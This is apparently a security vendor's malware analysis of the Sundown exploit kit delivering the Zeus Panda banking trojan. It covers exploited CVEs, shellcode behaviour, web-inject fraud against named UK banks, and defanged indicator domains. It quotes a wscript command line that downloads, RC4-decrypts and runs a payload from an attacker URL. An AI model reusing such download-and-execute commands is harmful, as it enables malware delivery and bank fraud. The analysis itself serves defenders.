Last week we noticed that Sundown Exploit Kit (EK) was distributing a banking trojan. Upon further investigation we discovered that the banking trojan was a new version of Zeus Panda. This malware has previously been delivered by the Angler, Nuclear and Neutrino EKs.
Sundown EK Landing Page
The Sundown EK landing page obfuscation has undergone several evolutions recently, indicating that the developer is highly active. An example of the landing page from July 25, 2016 was as below.
The exploits used by Sundown are dynamically written onto the page from the base64-encoded content on the landing page.
Sundown EK Exploits
While Sundown does not have the maturity and infrastructure of other EKs yet, its implementation of modern exploits makes it a dangerous threat. We are currently aware of three vectors that Sundown uses for exploiting a browser and executing malware:
- Adobe Flash Player exploits (CVE-2015-0313 & CVE-2015-0311)
- Microsoft Silverlight exploit (CVE-2016-0034)
- Internet Explorer (IE) exploits (CVE-2015-2419 & CVE-2016-0189)
All of these exploits attempt to execute shellcode which will download and execute a payload from another Sundown EK URL. The only significant difference between the exploit payload deliveries is that the IE exploits receive an RC4-encrypted version of the malware from "y.php" whereas the Flash and Silverlight exploits receive an unencrypted version of the malware from "z.php".
When we analysed the shellcode used in the IE CVE-2015-2419 exploit we observed cmd.exe being invoked with a command line to save a file to disk under "%tmp%\r3ak.tmp" and then execute the script with some parameters.
The script written to r3ak.tmp is a JScript which will download a payload from a URL provided, using a specified user-agent string. It will then RC4 decrypt the payload using a key given in the parameters and will finally execute the payload as an exe file.
In this example the script downloads the encrypted payload from "hxxp://ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh[.]xyz/y.php?id=67" and decrypts it using the key "gexywoaxor". The following command line is used to invoke the script which does this:
wscript /B /E:JScript r3ak.tmp "gexywoaxor" "hxxp://ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh[.]xyz/y.php?id=67" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)"
Zeus Panda Malware
Last week we noticed that Sundown was distributing the Panda banking trojan. This is an improved variant of the Zeus (Zbot) banking trojan, containing JSON and base64-encoded configurations and modules. We have blogged about Zeus variants in the past:
- Crimeware Based Targeted Attacks: Citadel Case, Part III
- Zeus PIF - The Evolving Strain Looking To Defeat Your Security Software
Zeus Panda's main configuration is downloaded from its command-and-control (C&C) and contains information regarding the associated botnet ID and additional modules to download.
Zeus's main capabilities include:
- Credential theft from various software such as browsers and FTP clients.
- Browser infection to steal banking traffic, take screenshots, and modify pages (man-in-the-browser).
- Remote desktop via VNC.
The malware will download typical Zeus "webinjects" which will allow browser pages to be modified.
These injections are used for modifying banking login pages in order to prompt a user for additional login details. This is done by the malware inserting itself into browsers (i.e. IE, Chrome, or Firefox) and modifying the content it receives from banking sites. This is known as a man-in-the-browser (MITB) attack, where the banking websites themselves are not infected but the user's browser is.
The details collected from these injections are then sent to the attacker's C&C where they will be used to login and steal money from a user's account.
Automated Transfer Scripts
The following example shows an ATS injection modifying a banking login page to prompt for card reader information. This information is not usually required for a normal login, and will instead be stolen by the malware.
The author of the ATS web injections also appears to be working on targeting Australian banking websites, but as of yet there is only one injection which simply displays an alert if the site is visited:
Zeus Panda attempts to defraud customers of the following financial institutions:
- Lloyds Bank
- Bank of Scotland
- Metro Bank
- Co-operative Bank
- Intelligent Finance
The Zeus Panda build we analysed had its debug output enabled so we were able to gain some insight into what it was doing at each stage of infection.
The names of some of the classes used in the source code are visible in the debug log, including previously known Zeus classes like "DynamicConfig". We can also see the Zeus Panda build version number here, which is "2.2.5".
Forcepoint™ customers are protected against this threat via TRITON® ACE at the following stages of attack:
- Stage 4 (Exploit Kit) - The Sundown EK sites are detected and blocked.
- Stage 5 (Dropper File) - The Zeus Panda malware files are detected.
The Zeus banking trojan was first identified in 2007 and its source code was leaked in 2011. Since 2011 there have been many spin-offs of Zeus, and evidently it still remains a popular choice for criminals. It is important to keep browser plug-ins such as Adobe Flash Player and Microsoft Silverlight up to date. It is also vital to keep up with the latest versions of browsers like IE, FireFox and Chrome in order to protect against exploit kits looking to deliver nasty malware such as Zeus Panda.
Indicators of Compromise (IOC)
hxxp://adsfgukhfgtiyasdftoduaystfuodastfuadstuf.faith hxxp://hkyjthrgecrvhdtfbygnumiunybfvdrcrvfbgyjnkhmi.xyz hxxp://ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh.xyz hxxp://dsjkfsjkdhfjshdfjkvkjbsvjksbvdkbsvjkbsvj.xyz hxxp://djsdhsdkjhsdfkjjsdfkkjbsdfsdjkjksdjbksdf.xyz hxxp://dkjjfhjsdfdjksdhfjksdfkjbsfhbsfhuyuiwqui.xyz hxxp://wejwerbjjrwjbkwrbjkwerbjkwerbjkwerjkbwer.xyz hxxp://rgdgfrsgfreagfer.xyz hxxp://cfisniuhicdngbhncmjifnvgfhtgjmicfgdjvgjh.xyz hxxp://ahoqeihiofehihiwefihoweohwefihihfeihwefh.xyz hxxp://cfhdnfvnkfcmjfgvkdgkdjhmdvjgnkdfvknvhdfm.xyz hxxp://dhsfiugduisdfuiudjfhuisdfhisjdhfifjshdifhuis.xyz hxxp://fgfbhnjhbgvfccsgvhbnuiuybtyvtrerxwcevrbtynyt.xyz hxxp://dhsfiugduisdfuiudjfhuisdfhisjdhfifjshdif.xyz hxxp://cfisniuhicdngbhncmjifnvgfhtgjmicfgdjvgjhfncf.xyz hxxp://adfouhafouihfaohfaoifadhafdihafdohfadouh.faith hxxp://sihasfidhfasdihdfadkiga.xyz hxxp://djhfsdhfiwebsddbijskdbfisjdbisjbfihsbjks.xyz hxxp://wqwuioeguhdbhsdvbhsvbusdfbuwevbuwhejfbshdfbi.xyz hxxp://wqwuioeguhdbhsdvbhsvbusdfbuwevbuwhejfbsh.xyz hxxp://wejkbweb3jkwejbbjwejbrebjwerjbewjkbwerbj.xyz hxxp://wejkbweb3jkwejbbjwejbrebjwerjbewjkbwerbjkerw.xyz hxxp://sodgihiegashiosgeadkiga.xyz hxxp://sodgihiegashiosgea.xyz hxxp://sodgihiegashiosgeadkigasdj.xyz hxxp://adsfhdpfasihiadfps.xyz hxxp://sertegegtgtregetg.xyz hxxp://serrtretrerrtret.xyz hxxp://serrtretretreggg.xyz hxxp://serregergergetrgg.xyz hxxp://sgriohsiegrhisgehsdkiga.xyz hxxp://ewfihwfehiiwfhowfowfwfwfihfwhwffjwfjbfwjbkfw.xyz hxxp://wghjsfgrhjsipgjsrg.xyz hxxp://fdshdiufsbuibnjosdnvjobsdbiyhvsbibdnjvosfnos.xyz hxxp://fdkgfkdklcdjfgkcdjfgklgdjkfldjgkldfjgkjd.xyz hxxp://rgeifjkarhfraekjghjk.xyz hxxp://dfkjkhsjkfhjkshdfjkhsdfkjhsfjbjkbsvksdkj.xyz hxxp://dfkjgldkfjgkldfjglkdlkfjgkldfldjfgkldfjk.xyz hxxp://ytvcrexrwrecvfbgnhhnbjvhrvfhbgnuhnybjvhfjbgn.xyz hxxp://dfkjgldkfjgkldfjglkdlkfjgkldfldjfgkldfjkldfj.xyz hxxp://ytvcrexrwrecvfbgnhhnbjvhrvfhbgnuhnybjvhf.xyz hxxp://dfkjkhsjkfhjkshdfjkhsdfkjhsfjbjkbsvksdkjbvkj.xyz hxxp://doishdjsdjbsdgfiysgdfiysgdfigsdigfisdgfs.xyz
Zeus Panda C&C
Zeus Panda ATS
Zeus Panda Samples (SHA1)